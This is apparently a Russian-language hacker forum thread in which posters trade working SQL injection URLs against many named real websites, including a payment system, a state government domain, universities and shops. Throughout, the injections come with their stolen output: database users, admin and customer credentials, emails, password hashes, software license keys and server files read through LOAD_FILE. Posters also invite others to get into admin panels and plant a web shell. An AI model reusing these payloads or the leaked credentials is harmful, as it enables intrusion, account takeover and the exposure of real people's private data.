products_options_id
products_options_value_id
Table [osc_customers_info (9730 Rows)]
customers_info_id
customers_info_date_of_last_logon
customers_info_number_of_logons
customers_info_date_account_created
customers_info_date_account_last_modified
global_product_notifications
Table [osc_geo_zones (4 Rows)]
geo_zone_id
geo_zone_name
geo_zone_description
last_modified
date_added
Table [osc_languages (1 Rows)]
languages_id
name
code
image
directory
sort_order
Table [osc_manufacturers (0 Rows)]
manufacturers_id
manufacturers_name
manufacturers_image
date_added
last_modified
Table [osc_manufacturers_info (0 Rows)]
manufacturers_id
languages_id
manufacturers_url
url_clicked
date_last_click
Table [osc_newsletters (0 Rows)]
newsletters_id
title
content
module
date_added
date_sent
status
locked
Table [osc_orders (9622 Rows)]
orders_id
customers_id
customers_name
customers_company
customers_street_address
customers_suburb
customers_city
customers_postcode
customers_state
customers_country
customers_telephone
customers_email_address
customers_address_format_id
delivery_name
delivery_company
delivery_street_address
delivery_suburb
delivery_city
delivery_postcode
delivery_state
delivery_country
delivery_address_format_id
billing_name
billing_company
billing_street_address
billing_suburb
billing_city
billing_postcode
billing_state
billing_country
billing_address_format_id
payment_method
cc_type
cc_owner
cc_number
cc_expires
last_modified
date_purchased
orders_status
orders_date_finished
currency
currency_value
cc_ccv
giftwrap
Table [osc_orders_freegift (4313 Rows)]
orders_freegift_id
orders_id
products_id
products_model
products_name
Table [osc_orders_products (26609 Rows)]
orders_products_id
orders_id
products_id
products_model
products_name
products_price
final_price
products_tax
products_quantity
Table [osc_orders_products_attributes (0 Rows)]
orders_products_attributes_id
orders_id
orders_products_id
products_options
products_options_values
options_values_price
price_prefix
Table [osc_orders_products_download (0 Rows)]
orders_products_download_id
orders_id
orders_products_id
orders_products_filename
download_maxdays
download_count
Table [osc_orders_status (3 Rows)]
orders_status_id
language_id
orders_status_name
Table [osc_orders_status_history (9938 Rows)]
orders_status_history_id
orders_id
orders_status_id
date_added
customer_notified
comments
Table [osc_orders_total (29240 Rows)]
orders_total_id
orders_id
title
text
value
class
sort_order
Table [osc_products (358 Rows)]
products_id
products_quantity
products_model
products_image
products_price
products_date_added
products_last_modified
products_date_available
products_weight
products_status
products_tax_class_id
manufacturers_id
products_ordered
Table [osc_products_attributes (2 Rows)]
products_attributes_id
products_id
options_id
options_values_id
options_values_price
price_prefix
Table [osc_products_attributes_download (1 Rows)]
products_attributes_id
products_attributes_filename
products_attributes_maxdays
products_attributes_maxcount
Table [osc_products_description (357 Rows)]
products_id
language_id
products_name
products_description
products_url
products_viewed
Table [osc_products_notifications (3 Rows)]
products_id
customers_id
date_added
Table [osc_products_options (7 Rows)]
products_options_id
language_id
products_options_name
Table [osc_products_options_values (14 Rows)]
products_options_values_id
language_id
products_options_values_name
Table [osc_products_options_values_to_products_options (14 Rows)]
products_options_values_to_products_options_id
products_options_id
products_options_values_id
Table [osc_products_to_categories (550 Rows)]
products_id
categories_id
Table [osc_reviews (0 Rows)]
reviews_id
products_id
customers_id
customers_name
reviews_rating
date_added
last_modified
reviews_read
Table [osc_reviews_description (0 Rows)]
reviews_id
languages_id
reviews_text
Table [osc_sessions (0 Rows)]
sesskey
expiry
value
Table [osc_specials (0 Rows)]
specials_id
products_id
specials_new_products_price
specials_date_added
specials_last_modified
expires_date
date_status_change
status
Table [osc_tax_class (1 Rows)]
tax_class_id
tax_class_title
tax_class_description
last_modified
date_added
Table [osc_tax_rates (1 Rows)]
tax_rates_id
tax_zone_id
tax_class_id
tax_priority
tax_rate
tax_description
last_modified
date_added
Table [osc_whos_online (39 Rows)]
customer_id
full_name
session_id
ip_address
time_entry
time_last_click
last_page_url
Table [osc_zones (168 Rows)]
zone_id
zone_country_id
zone_code
zone_name
Table [osc_zones_to_geo_zones (236 Rows)]
association_id
zone_country_id
zone_id
geo_zone_id
last_modified
date_added
Table [partner (9 Rows)]
partner
par_name
par_logo
par_web
par_comment
par_statut
par_order
par_createdate
par_modifdate
par_login
par_type
Table [playlist (3841 Rows)]
show_start_date
pla_position
pla_titre
pla_artist
pla_country
pla_album
pla_label
include
show_title
wee_startdate
wee_enddate
playlist
pla_week
pla_statut
pla_createdate
pla_modifdate
pla_login
pla_urlartist
Table [prefs (412 Rows)]
prf_auteur
prf_class
prf_fieldname
prf_affichage
prf_affichageapercu
prf_actiondata_subs
Table [radio (179 Rows)]
radio
rad_city
rad_country
state_id
rad_freq
airdate_spotlight
rad_time
rad_web
rad_station
radiolist
spotlight
last_update
rad_name
Table [states (66 Rows)]
abbr
state
state_id
ctr
Table [staticpages (2 Rows)]
staticpages
sta_page
sta_contentpage
sta_createdate
sta_modifdate
sta_login
Table [support (9 Rows)]
support
sup_osc_categories_id
sup_name
sup_createdate
sup_modifdate
sup_login
suffix
format
sup_code
Table [tablelist (22 Rows)]
tablelist
tbl_name
Table [track (2386 Rows)]
track
tra_title
tra_artist
tra_sample
item_id
tra_position
rank
tra_nunit
tra_urlartist
tra_urltarget
tra_createdate
tra_modifdate
tra_login
tra_statut
tra_samplewm
Table [uscanadadistrib (18 Rows)]
uscanadadistrib
usc_type
usc_name
usc_comment
usc_phone
usc_fax
usc_email
usc_web
usc_contact
usc_statut
usc_createdate
usc_modifdate
usc_login
usc_category
usc_order
usc_country
Table [week (247 Rows)]
wee_title
wee_startdate
wee_enddate
wee_createdate
wee_modifdate
wee_login
week

Сайт платежной системы www.qiwi.ru

http://www.qiwi.ru/site/?news&id=57+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCA T(0x536d6f747269207379756461202d2d2d3e,Version(),0 x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71 ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28+LIMIT+1,1/*

Database Version: 4.1.22-log
Database name: joomla
User name: joomla@www.osmp.ru

Подобрал только jos_users

http://www.qiwi.ru/site/?news&id=57+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCA T_WS(0x3a,email,gid,id,name,0x566f742065746f207061 726f6c5c272076204d44352d2d3e,password,sendemail,us ername),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28+FROM+jos_ users+LIMIT+3,1/*

[0]:mum@osmp.ru:25:62:Administrator:1cd87f5976c0893cb 50d0758f528963f:1:admin pass q1w2e3r4t5y6
[1]:creann@osmp.ru:25:63:Сергей Халилов:1cd87f5976c0893cb50d0758f528963f:0: creann pass cracked q1w2e3r4t5y6
[2]:t.susorova@osmp.ru:23:65:Татьяна Сусорова:827ccb0eea8a706c4c34a16891f84e7b: 0:soleil
pass cracked 123456


админка
www.qiwi.ru/new/administrator

на момент написания админка загружалась... но пасс не подходил...
Спасиб всем !

Kentucky Horse Park | Lexington, KY Магазин

http://www.kyhorsepark.com/detail.php?select=3067798798765+union+select+1,2,3 ,4,5,concat_ws(0x3a,version(),user(),database()),7 ,8,9,10,11,12,13,14,15,16,17,18--&pageid=87&sectionid=15&cat=06&page=Online%20Gift%20Shop


Database Version: 5.0.27-community-nt
Database name: test
User name: eleuser05@localhost

Берём рута


http://www.kyhorsepark.com/detail.php?select=3067798798765+union+select+1,2,3 ,4,5,concat_ws(0x3a,user,password),7,8,9,10,11,12, 13,14,15,16,17,18+from+mysql.user+limit+0,1--&pageid=87&sectionid=15&cat=06&page=Online%20Gift%20Shop


root : *D9CE563515E8C4166F66D84C2EAA499221AA6889




Файло лить можно -)



Тут глобальные Админы


http://www.kyhorsepark.com/detail.php?select=3067798798765+UNION+SELECT+1,2,3 ,4,5,CONCAT(0x3a,(SELECT+CONCAT(Name,0x3a,userid,0 x3a,pass,0x3a,Global)+FROM+test.khp_administrators +LIMIT+3,1),0x3a),7,8,9,10,11,12,13,14,15,16,17,18--&pageid=87&sectionid=15&cat=06&page=Online%20Gift%20Shop


[1] : Amy Shaw:ashaw : pass123 : Yes
[2] : Chris Gowin:cgowin : pass123 : Yes
[3] : Gina Gibson:ggibson : dogs*blues : Yes
[4] : Lisa Jackson:ljackson : ringo : Yes
[5] : Jodi Dickey:jdickey : horse : Yes
[6] : Cindy Armstrong:carmstrong : neeter : Yes
[7] : Kathy Hopkins:khopkins : tory : Yes
[8] : Laurie Brown:lbrown : guinness : Yes




Это типа куда че надо лезть -)

http://www.kyhorsepark.com/robots.txt

В общем зе енд -)


PageRank = 6

http://www.greenleaf.org/catalog/item.php?itemID=7280976687+union+select+1,concat_w s(0x3a,version(),user(),database()),3,4,5,6,7,8,9, 10,11,12,13,14--


Database Version: 5.0.67-log
Database name: grnleaf_catalog
User name: grnleaf@209.68.1.65



Encore Electronics Inc !

http://www.encore-usa.com/product_item.php?region=us&bid=27898699+union+select+concat_ws(0x3a,version() ,user(),database())--&pgid=82_9&pid=2


Database Version: 5.0.67-community-log
Database name: encoreus_website1
User name: encoreus_yroot@localhost


http://www.cunninghamreport.com/news_item.php?id=696876876873+union+select+1,2,con cat_ws(0x3a,version(),user(),database()),4,5,6,7--

Database Version: 4.0.15-standard
User name: tcrdc@localhost
Database name: cunningham


http://www.clublaugh.com/item.php?id=3687655448+union+select+concat_ws(0x3a ,version(),user(),database()),2--&sort=date

Database Version: 4.1.22
User name: clublaugh@localhost
Database name: clublaugh


http://www.firstalert.com/smoke_alarms_item.php?pid=3778976665+union+select+ 1,2,concat_ws(0x3a,version(),user(),database()),4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54--



Database Version: 4.1.22
User name: fir5tal3rt@localhost
Database name: firstalert


Япона мат! -)


http://www.c-one.or.jp/cgi-bin2/product_catalog/index_details.php?product_id=579865404760+union+se lect+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),d atabase()),8,9,10,11,12--


Database Version: 4.0.27
User name: wakofirm@219.94.155.138
Database name: wakofirm




А тут такая музыка приятная играет прям ощущаешь себя в лесу возле костра...

http://www.erlebe-was.de/main/index.php?webcode=productdetail&product_id=798750987077650+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x 3a,version(),user(),database()),21,22,23,24--&category_id=25


Version:4.1.13
User:db_user062000_1@localhost
Database:db062000_1



MRLocks Security System! Во как.

http://mr-locks.com/service_item.php?id=17898695076+union+select+1,2,3 ,concat_ws(0x3a,version(),user(),database()),5,6--

Version:4.1.21-Max-log
User:u1060631_mrlocks@172.20.18.69
Database:db1060631_mrlocks

PR 6

http://www.okcommerce.gov/index.php?option=com_docman&sectionid=8&Itemid=636&subcat=-74+/*&order=*/+union%0A+select+1,concat_ws(0x3A,username,passwor d,email),3,4,5,6,7,8+from+mos_users/*&ascdesc=DESC

admin:cardinal,
мб админка фейк т.к. в админ панель не пускает под gid=25(админ правами),или идет хак с превязкой к ип для админов.

Все сайты на данном хосте имеют уязвимость...выложу только один из них
В админку зайти не получается, скорей всего привязка к айпи... если у кого нибудь получится зайти а еще лучше залить шелл буду очень признателен ибо надо добратся до одного сайта на хосте. Заранее спасибо.
http://www.tshirts.ro/shop_add.php?pid=-116+UNION+SELECT+1,Concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14--%20&ownerid=63

Database Version: 5.0.27-log
Database name: tsh
User name: tsh@htdweb

Все сайты на данном хосте имеют уязвимость...выложу только один из них
В админку зайти не получается, скорей всего привязка к айпи... если у кого нибудь получится зайти а еще лучше залить шелл буду очень признателен ибо надо добратся до одного сайта на хосте. Заранее спасибо.
http://www.tshirts.ro/shop_add.php?pid=-116+UNION+SELECT+1,Concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14--%20&ownerid=63

Database Version: 5.0.27-log
Database name: tsh
User name: tsh@htdweb


http://www.webdesigners.ro/forum/admin/

Основное тело это webmaster c одним и тем же хешом так что думаю мы на верном пути -)


webmaster:b46b0fb4559b9f0f01635aa25ac942dd


Пароль не перебрал попробуй если переберешь в админке форума покопать я так думаю там не проблема будет залить че нить куда нить.


А вообще по их сайтам форум багнутый так что может тебе повезет всё таки через форум их достать


http://www.webdesigners.ro/forum/forum_display.php?fid=42&mid=-1784+union+select+1,Concat_ws(0x3a,version(),datab ase(),user()),3,4--&act=last#last


Database Version: 5.0.27-log
Database name: webdesigners
User name: webdesigners@htdweb


Этих людей достал но не знаю нужны ли они тебе

логин пароль мыло
emobil:cantemir : contact@htd.ro
crocodilul:cantemir : contact@htd.ro
singur:cantemir : contact@htd.ro
sexpert:cantemir : contact@htd.ro
1tuningclient : cantermir:contact@htd.ro

В общем удачи.

http://www.meridianproductivity.co.uk/news.php?article=2[sql]
Db:aaaacby_meridianproductivity
Version:5.0.32-Debian_7etch8-log
User:aaaacba_meridian@192.168.214.62

articles
testimonials

Еще рут -)

https://www.rsvp.com/item.php?item=68099809809+UNION+SELECT+AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database() ,0x2F2A2A2F,User(),0x3a),0x71),0x71),2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38--

Database Version: 4.1.14-nt
Database name: rsvp
User name: root@localhost


https://www.rsvp.com/item.php?item=68099809809+UNION+SELECT+AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,password,0x2F2A2A2F,User, 0x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38+from+mysql.user--


root : 1c2e84cd19d4344c хэш MySQL : 1c2e84cd19d4344c : sli9Gnet

В базу с любых хостов под рутом -)

Читаем файло c:\boot.ini

Хех это я так отвлёкся....

https://www.rsvp.com/item.php?item=68099809809+UNION+SELECT+AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x633A2F626F6F7 42E696E69),0x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38--


http://www.kknk.co.za/cpage.php?id=89798698654+UNION+SELECT+1,AES_DECRYP T(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database( ),0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7,8,9,10,1 1--

Database Version: 4.1.12-standard-log
Database name: kknk_db1
User name: sandbn_16@www37.cpt1.host-h.net


http://www.ofwguide.com/article_item.php?articleid=7898798690689+union+sel ect+1,2,Concat_ws(0x3a,version(),database(),user() ),4--



Database Version: 4.1.22-standard
Database name: ofwguide_ofwguidedb
User name: ofwguide_abbie@localhost



http://www.archidb.com/archiinfo/3.asp?div_id=09&product_id=500+or+1=@@version--&company_id=49&det_id=09544

Microsoft SQL Server 2000 - 8.00.679 (Intel X86) Aug 26 2002 15:09:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4

http://www.archidb.com/archiinfo/3.asp?div_id=09&product_id=500+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+ ('DETAILS','BOARD','CATALOG','CATALOG_TEMP','CDCON T','COMPANY','COMPANY_REJECT','D99_Tmp','DET_CODE' ,'DET_VIEW','DETAILS_TEMP','division','dtpropertie s','FREE','FREEBOARD','GRP_CODE','GRP_VIEW','h_NEW S','input_c','j_BOARD','jorye','NEWSBOARD','NOTICE ','poll','poll_re','POSTNO','PRODUCTS','PRODUCTS_C HECK','PRODUCTS_REJECT','PRODUCTS_TEMP','PRODUCTS_ TEMP_CHECK,'PRODUCTS_TEMP_CHECK'))--&compa

http://www.akvadra.ru/products.html?id=-20+union+select+concat_ws(0x3a,user,password,host, file_priv,database(),version(),user(),0x3c42523e3c 42523e,load_file(0x2f6574632f706173737764)),2,3,4, 5,6,7+from+mysql.user--

root:41a2cc174ae9076e:localhost:Y:akvadra:5.0.27:n ews@localhost:

плюс куча всяких юзверей..

http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%201,group_concat(table_name)%20 from%20information_schema.tables%20%20--
===============

http://www.theonlineadnetwork.com/affiliates/sim.php?itemid=-1%20union%20select%201,group_concat(column_name),3 ,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=0x41646d696e-- (Пароль админа и всех юзеров без хеша, пейпал данныи и т.д.))
===============

http://desilassi.com/song.php?l_id=-1%20union%20select%201,2,concat(log_id,0x3a,log_na me,0x3a,log_pass,0x3a,log_emailid,0x3a,mailing_lis t,0x3a,conform),4,5,6,7,8%20from%20desi_login-- (Туева хуча пользователей паролей и мыльников и никаких хешей =)) Я уже окло 50 идиотов отобрал которые мыльники регают с одинаковыми паролями как и на сайте ))

ПСЖ че то седня день удачдный, больше 10 сайтов за вечер хакнул =))

PS: ВОт админские 1:admin:admin6002
Найти бы админку... =))

PR5

http://mial.cs.sfu.ca/newsItem.php?id=-1+union+select+1,Username,3,Password,5,6,7,8+from+ User--

Пароль почему то пустой
Кто хочет, сам пусть ковыряется
Админка mial.cs.sfu.ca/admin

http://www.visa-tour.ru/sim.php?parent_id=-1%20union%20select%201,group_concat(table_name),3, 4,5,6,7,8,9%20from%20information_schema.tables--

Программа какая-то серьезная 500 $ стоимость лицензии Project Management Methodology

Проданно более 1500 лиц.Ну да ладно неважно -)


http://www.mpmm.com/news-item.php?id=468796872+UNION+SELECT+1,2,AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database() ,0x3a,User(),0x3a),0x71),0x71),4,5,6,7--


Database Version: 5.0.27-community-nt
Database name: jwestland
User name: jwestland@localhost

http://www.mpmm.com/news-item.php?id=468796872+UNION+SELECT+1,2,AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(email,0x3a ,password)+FROM+jwestland.users+LIMIT+5,1),0x3a),0 x71),0x71),4,5,6,7--

Fields email:password

: jason@method123.com : Klimber56
: remko@paradise.net.nz : pukeora
: bassam@eim.ae : QPGklPZ
: dunnigr@socom.mil : GM78tBm
: kasboko@yahoo.com :
: grarms@ship.edu : allison

http://www.mpmm.com/news-item.php?id=468796872+UNION+SELECT+1,2,AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(user_id,0x 3a,version,0x3a,license_id,0x3a,license_num,0x3a,s erial_no,0x3a,maint_expiry)+FROM+jwestland.user_pr oducts+LIMIT+1505,1),0x3a),0x71),0x71),4,5,6,7--



Fields user_id:version:license_id:license_num:serial_no:m aint_expiry

:1704 : educational : 0:1:682R6-TQYVZ-28O0U-EHV32:2009-07-11 08:41:28
:1705:professional : 0:2:IVUGX-7M7CZ-XK0A3-CYSS1:2009-07-11 09:59:24
:1706:educational : 0:1:IWWHM-TOAAZ-9A3OW-PT9R3:2009-07-11 10:09:35
:1707:professional : 0:1:5NEB7-X4YCZ-2OG32-DAJJ5:2009-07-11 11:54:52
:1709:professional : 0:1:HAXR4-G6VEZ-Y3LGW-LP5N4:2009-07-13 09:48:56
:1710:standard : 0:1:LDOB0-GDVQZ-L86WV-9AP02:2009-07-14 02:40:48




Таблеточки таблеточки -)


http://www.dreddy-clinic.com/details.php?product_id=13876876859+union+select+1, 2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Vers ion(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71 ),8,9,10,11,12,13,14,15,16,17,18,19,20--

Database Version: 5.0.16-log
Database name: dreddy_clinic
User name: dreddy-clinic@localhost


Дядя или Тётя Админ суть не в этом

http://www.dreddy-clinic.com/details.php?product_id=13876876859+UNION+SELECT+1, 2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SEL ECT+CONCAT(u,0x3a,pass,0x3a,enable)+FROM+dreddy_cl inic.u+LIMIT+0,1),0x3a),0x71),0x71),8,9,10,11,12,1 3,14,15,16,17,18,19,20--


dreddy-clinic : 408c05fba1f0a28b9a74ddaf6f79991d :


Теперь дядей Тётей из пользователей


http://www.dreddy-clinic.com/details.php?product_id=13876876859+UNION+SELECT+1, 2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SEL ECT+CONCAT(username,0x3a,password,0x3a,email)+FROM +dreddy_clinic.users+LIMIT+1,1),0x3a),0x71),0x71), 8,9,10,11,12,13,14,15,16,17,18,19,20--

Там в общем есть еще phpbb 3 но зачем -)

http://www.fixfault.com/fix.php?grp=-1+union+select+1,group_concat(id,0x3a,group_name,0 x3a,picture_id),3%20from%20group_data%20--

http://www.kyma.com/slp.php?idN=16746876876876876+UNION+SELECT+1,2,3,4 ,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3 a,Database(),0x3a,User(),0x3a),0x71),0x71),6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22-- &cat=News

Database Version: 5.0.45
Database name: kyma
User name: controls_moz@136899-web1.www.kyma.com


Дядьки админы


http://www.kyma.com/slp.php?idN=16746876876876876+UNION+SELECT+1,2,3,4 ,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCA T(usuusuario,0x3a,usucontrasena,0x3a,usuemail)+FRO M+kyma.usu+LIMIT+2,1),0x3a),0x71),0x71),6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22-- &cat=News

: admin : kyma : pkonecny@KYMA.com



Сама Админка

http://www.kyma.com/admin/



http://www.vintagevirginiaapples.com/Shop_Show_product.php?Product_Id=2798792698+union+ select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user (),database()),9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23--

Version: 4.1.22
User: apples@localhost
Database: apples



http://www.antique-source.com/main/item.php?product_id=798198779+union+select+1,2,3,4 ,5,concat_ws(0x3a,version(),user(),database()),7,8 ,9,10,11,12,13,14,15,16,17,18,19,20--

Version: 4.1.22-max-log
User: an719ue80rce@208.109.181.115
Database: an719ue80rce



http://www.cassatt.com/resources.php?ID=77772/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*


Database Version: 4.1.12
Database name: cassattMain
User name: dbCassatt@localhost

4 version()
http://www.transit.lt/next.php?nr=81&firma=-8%20union%20select%201,2,3,4,5,6,pass,8%20from%20u sers--

http://www.terberken.be/sitelies/incl/lager/mvd.php?id=-31%20union%20select%201,2,version(),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17%20--
http://www.koreandog.co.kr/01kennel/02diary/love.php?page=1&knum=-4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,versi on(),13,14,15,16,17,18,19,20,21,22--
http://tingdong.powersugoi.net/song.php?song=-1%20union%20select%201,2,version(),4,5,6,7,8,9,10, 11,12,13,14,15--
http://www.nepomn.ru/song.php?variant_id=123123123%20union%20select%201 ,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17--

PageRank = 7

http://rmc.library.cornell.edu/presidents/exhibition.php?sec=1+union+select+1,concat_ws(0x3a ,version(),user(),database()),3--


Version: 4.1.22-standard
User: rmc@localhost
Database: rmc_presidents_new


http://www.modernbamboo.com/item.php?prodid=6687655434+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x 3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x7 1),0x71),14,15--


Database Version: 4.1.14
Database name: modbamboo
User name: yroot@localhost


http://www.niteize.com/productdetail.php?category_id=28&product_id=1798716988+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0 x3a,version(),user(),database())--


Version: 4.1.22-standard
User: niteize_info@localhost
Database: niteize_info


http://www.aluratek.com/product_info.php?products_id=37987987987+union+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,concat_ws(0x3a,version(),user(),databas e()),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39--&display=All

Database Version: 5.0.67-community
Database name: alurwan9_aluratek
User name: alurwan9_web@localhost



http://www.cabelas.ca/news_and_information/?newsid=55%20or%201=@@version--


Microsoft SQL Server 2005 - 9.00.3175.00 (Intel X86) Jun 14 2007 09:20:57 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.fedline.canberra.net.au/php/page.php?id=-16+union+select+1,2,3,4,unhex(hex(version())),6,7/*
4.1.11-Debian_4sarge7
fedline@localhost

http://www.baptist-church.com.au/churches.php?page=-4%27+union+select+1,2,concat_ws(0x3a,user_login,us er_pass),4,5,6,7+from+blog_users/*
Смотреть в тайтл
dbuser@localhost
5.0.27
admin:$P$BulIvm2PP9ASqfoU5bQGiogFgrDlgT/

http://www.leeuwinestate.com.au/index.php?page=-84%27+union+select+version()/*
Вывод в сорсе смотрим
4.1.16-standard-log
leeuwinestate@abcamps.databases.armato.com.au

http://moodie.revotech.biz/category.php?id=-1120+union+select+1,2,3,concat_ws(0x40,table_schem a,table_name),5,6,7,8,9,10,11,12+from+information_ schema.tables+limit+17,1/*
5.0.22
mydomains_moodiedb@tbl_administrator
{
admin_name
admin_username
admin_password
}
REVO:3f9c206f764fc1582a64eb7a5a7ca20c079a0ae8:6mbh cd
Martin:3458e1c69536aacc7e0e015a8085484b5c95d2ad:ma ryam
jon:a1bf7a55f83a2956114b77137074f1e3a6b5c036:mauns ell
matt:2f7d6e26289946e37e1fa56d4643771ad2c6b193:m00d i3
mydomains_moodiedb@user
mydomains_moodiedb@wp_users

http://rmc.library.cornell.edu/presidents/exhibition.php?sec=1+union+select+1,concat(user,0x 3a,password),3%20from%20mysql.user--

http://www.baneasashoppingcity.ro/event.php?id=-6+UNION+SELECT+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8--

Database Version: 5.0.45
Database name: bsc
User name: bscwww@localhost

http://www.templateshunt.com/template.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22--

http://www.salutbucuresti.ro/index.php?pc=detalii&categ=0&id=-1012+UNION+SELECT+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5,6,7,8,9,10,11,12,13/*


Database Version: 5.0.27
Database name: salut
User name: salut@localhost

http://www.davespictures.org/concertsinmichigan/fix.php?type=venue&id=-1%20union%20select%201,2,version(),User(),5,6,7%20--

_http://www.dittberner.com/

http://www.dittberner.com/reports/about.php?id=-5+union+select+1,2,3,4,username,6,7,8+from+user+li mit+1,1--
http://www.dittberner.com/reports/about.php?id=-5+union+select+1,2,3,4,password,6,7,8+from+user+li mit+1,1--

varbobitis:6215defe2a2da202

http://www.dittberner.com/login.php

PR: 5

http://www.ugbs.edu.gh/site/newsevents/newsdetails.php?id=-70+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10--

Еще один -)
http://collectorsassemble.com/key.php?page_id=-1%20union%20select%20concat(owner_id,0x3a,owner,0x 3a,owner_full,0x3a,username,0x3a,password),2,3%20f rom%20owner%20limit%201,1--

Хрен поймешь куда эти логины и пароли, рега без паса в таблице customer вроде..

pr6
http://www.devicelink.com/products/prods.php?ProdsID=-1561+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
4.0.23-standard-log

Программистам


Software Programming Components Warehouse !

http://www.cookcode.com/product_detail.php?product_id=5798765476+union+sel ect+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(), user(),database()),12,13,14,15,16,17,18,19,20,21,2 2--


Database Version: 5.0.67-community-log
Database name: sharewar_cookcode
User name: sharewar_june@localhost

Ишем админов вендоров селлеров


http://www.cookcode.com/product_detail.php?product_id=5798765476+UNION+SEL ECT+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYPT(C ONCAT(0x3a,(SELECT+CONCAT(isadmin,0x3a,isvendor,0x 3a,isreseller,0x3a,email,0x3a,password)+FROM+share war_cookcode.users+LIMIT+0,1),0x3a),0x71),0x71),12 ,13,14,15,16,17,18,19,20,21,22--



Fields isadmin:isvendor:isreseller:email:password



1:1:1:webmaster@cookcode.com : d4524322453ffdc5a5b9be7197d20bb3
0:1:0:support@codeidea.com : ec72e3ac7a2bd7952620d8bbc44da693
0:1:0:sales@asptodll.com : 0c8054c65786089a9f58e97d26c60272
0:1:0:sales@mediadmin.com : be5d7fad6cb22911f7dacb0e1a82a827
0:1:0:e5988e@yahoo.com : 4c4e7fa2e7efff845aae5009d51adb6f
0:0:0:ulissespsm@hotmail.com : d93a5def7511da3d0f2d171d9c344e91

http://www.xpresstrading.nl/verkoop/productdetail.php?product_id=168&category_id=-34%20union%20select%201,2,concat_ws(0x3a,admin_id, admin_login,admin_pass,admin_email),4%20from%20adm in--

admin_id,admin_login,admin_pass,admin_email
2:admin:rob:test@webciters.com

Вот вчера ночью совершил набеги на сайты rin.ru

http://news.rin.ru/photojur/-190086'+union+select+1,concat_ws(0x3a,user(),datab ase(),version())+--+/1/1/
юзер - postcards@192.168.1.233
бд - news
версия mysql - 4.1.20

http://persona.rin.ru/view/fall/0/-37185+union+select+1,concat_ws(0x3a,version(),data base(),user()),3,4,5/biljaletdinov-dinijar
юзер - postcards@192.168.1.234
бд - persona
версия mysql - 4.1.20

http://tests.rin.ru/cgi-bin/test.cgi?N=0&test=-544'+union+select+concat_ws(0x3a,version(),user(), database()),2,3,4,5,6+--+
юзер - postcards@192.168.1.13
бд - tests
версия mysql - 4.1.22-log

